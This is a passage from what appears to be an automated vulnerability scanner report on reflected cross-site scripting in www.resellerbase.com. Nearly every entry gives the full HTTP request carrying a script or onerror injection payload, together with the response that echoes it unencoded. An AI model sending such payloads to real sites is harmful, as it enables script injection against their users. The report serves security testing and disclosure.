The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cellulare5cd6</title><img%20src%3da%20onerror%3dalert(1)>7ffe369e170294cd0?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellulare5cd6</title><img src=a onerror=alert(1)>7ffe369e170294cd0</title>
...[SNIP]...

2.4214. http://www.resellerbase.com/tag/cellular [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd78b<img%20src%3da%20onerror%3dalert(1)>ea9ca491a5a was submitted in the REST URL parameter 2. This input was echoed as cd78b<img src=a onerror=alert(1)>ea9ca491a5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cellularcd78b<img%20src%3da%20onerror%3dalert(1)>ea9ca491a5a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellu
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cellularcd78b<img src=a onerror=alert(1)>ea9ca491a5a]</td>
...[SNIP]...

2.4215. http://www.resellerbase.com/tag/cellular [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ab7d<img%20src%3da%20onerror%3dalert(1)>b70a306833ed709b1 was submitted in the REST URL parameter 2. This input was echoed as 1ab7d<img src=a onerror=alert(1)>b70a306833ed709b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cellular1ab7d<img%20src%3da%20onerror%3dalert(1)>b70a306833ed709b1?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellu
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cellular1ab7d<img src=a onerror=alert(1)>b70a306833ed709b1]</td>
...[SNIP]...

2.4216. http://www.resellerbase.com/tag/chat [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/chat

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eee88<script>alert(1)</script>788f62f85fedb649d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tageee88<script>alert(1)</script>788f62f85fedb649d/chat?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tageee88<script>alert(1)</script>788f62f85fedb649d/chat?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4217. http://www.resellerbase.com/tag/chat [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/chat

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18526<script>alert(1)</script>5231ced6d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag18526<script>alert(1)</script>5231ced6d97/chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag18526<script>alert(1)</script>5231ced6d97/chat was not found on this server.</p>
...[SNIP]...

2.4218. http://www.resellerbase.com/tag/chat [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b9b46</title><img%20src%3da%20onerror%3dalert(1)>e40eaaa0509957376 was submitted in the REST URL parameter 2. This input was echoed as b9b46</title><img src=a onerror=alert(1)>e40eaaa0509957376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/chatb9b46</title><img%20src%3da%20onerror%3dalert(1)>e40eaaa0509957376?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chatb9b46</title><img src=a onerror=alert(1)>e40eaaa0509957376</title>
...[SNIP]...

2.4219. http://www.resellerbase.com/tag/chat [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2365<img%20src%3da%20onerror%3dalert(1)>80f3e464faa4312f5 was submitted in the REST URL parameter 2. This input was echoed as a2365<img src=a onerror=alert(1)>80f3e464faa4312f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/chata2365<img%20src%3da%20onerror%3dalert(1)>80f3e464faa4312f5?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chata
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : chata2365<img src=a onerror=alert(1)>80f3e464faa4312f5]</td>
...[SNIP]...

2.4220. http://www.resellerbase.com/tag/chat [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7f83<img%20src%3da%20onerror%3dalert(1)>2e876c53475 was submitted in the REST URL parameter 2. This input was echoed as f7f83<img src=a onerror=alert(1)>2e876c53475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/chatf7f83<img%20src%3da%20onerror%3dalert(1)>2e876c53475 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chatf
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : chatf7f83<img src=a onerror=alert(1)>2e876c53475]</td>
...[SNIP]...

2.4221. http://www.resellerbase.com/tag/chat [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/chat

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f452a</title><img%20src%3da%20onerror%3dalert(1)>62cfbf2461a was submitted in the REST URL parameter 2. This input was echoed as f452a</title><img src=a onerror=alert(1)>62cfbf2461a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/chatf452a</title><img%20src%3da%20onerror%3dalert(1)>62cfbf2461a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: chatf452a</title><img src=a onerror=alert(1)>62cfbf2461a</title>
...[SNIP]...

2.4222. http://www.resellerbase.com/tag/dating [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dating

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d660<script>alert(1)</script>21dfa66dbefa5a4d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag3d660<script>alert(1)</script>21dfa66dbefa5a4d5/dating?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3d660<script>alert(1)</script>21dfa66dbefa5a4d5/dating?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4223. http://www.resellerbase.com/tag/dating [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dating

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a584a<script>alert(1)</script>b39fcc11bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /taga584a<script>alert(1)</script>b39fcc11bcf/dating HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /taga584a<script>alert(1)</script>b39fcc11bcf/dating was not found on this server.</p>
...[SNIP]...

2.4224. http://www.resellerbase.com/tag/dating [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 40946</title><img%20src%3da%20onerror%3dalert(1)>00cf8fbf466f9fd56 was submitted in the REST URL parameter 2. This input was echoed as 40946</title><img src=a onerror=alert(1)>00cf8fbf466f9fd56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dating40946</title><img%20src%3da%20onerror%3dalert(1)>00cf8fbf466f9fd56?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dating40946</title><img src=a onerror=alert(1)>00cf8fbf466f9fd56</title>
...[SNIP]...

2.4225. http://www.resellerbase.com/tag/dating [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8acc8</title><img%20src%3da%20onerror%3dalert(1)>4e494e902d6 was submitted in the REST URL parameter 2. This input was echoed as 8acc8</title><img src=a onerror=alert(1)>4e494e902d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/dating8acc8</title><img%20src%3da%20onerror%3dalert(1)>4e494e902d6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: dating8acc8</title><img src=a onerror=alert(1)>4e494e902d6</title>
...[SNIP]...

2.4226. http://www.resellerbase.com/tag/dating [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 159ea<img%20src%3da%20onerror%3dalert(1)>ac76462cb1fd32472 was submitted in the REST URL parameter 2. This input was echoed as 159ea<img src=a onerror=alert(1)>ac76462cb1fd32472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/dating159ea<img%20src%3da%20onerror%3dalert(1)>ac76462cb1fd32472?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: datin
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : dating159ea<img src=a onerror=alert(1)>ac76462cb1fd32472]</td>
...[SNIP]...

2.4227. http://www.resellerbase.com/tag/dating [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dating

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab487<img%20src%3da%20onerror%3dalert(1)>0baaef7ca88 was submitted in the REST URL parameter 2. This input was echoed as ab487<img src=a onerror=alert(1)>0baaef7ca88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/datingab487<img%20src%3da%20onerror%3dalert(1)>0baaef7ca88 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: datin
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : datingab487<img src=a onerror=alert(1)>0baaef7ca88]</td>
...[SNIP]...

2.4228. http://www.resellerbase.com/tag/domain [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fa69<script>alert(1)</script>4376a856301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Here the reflection is in the 404 error page rather than in a normal content page: the request URL is written back into the response body without HTML encoding. That 404 response is generated by PHP (it carries X-Powered-By: PHP/5.2.14) and is served as text/html, and browsers render an error body like any other page, so the 404 status does not reduce exploitability.

Request

GET /tag8fa69<script>alert(1)</script>4376a856301/domain HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8fa69<script>alert(1)</script>4376a856301/domain was not found on this server.</p>
...[SNIP]...

2.4229. http://www.resellerbase.com/tag/domain [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d775<script>alert(1)</script>d05d5eb6c7f7729e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag6d775<script>alert(1)</script>d05d5eb6c7f7729e9/domain?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6d775<script>alert(1)</script>d05d5eb6c7f7729e9/domain?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4230. http://www.resellerbase.com/tag/domain [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18c5c<img%20src%3da%20onerror%3dalert(1)>f337ab86790 was submitted in the REST URL parameter 2. This input was echoed as 18c5c<img src=a onerror=alert(1)>f337ab86790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/domain18c5c<img%20src%3da%20onerror%3dalert(1)>f337ab86790 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
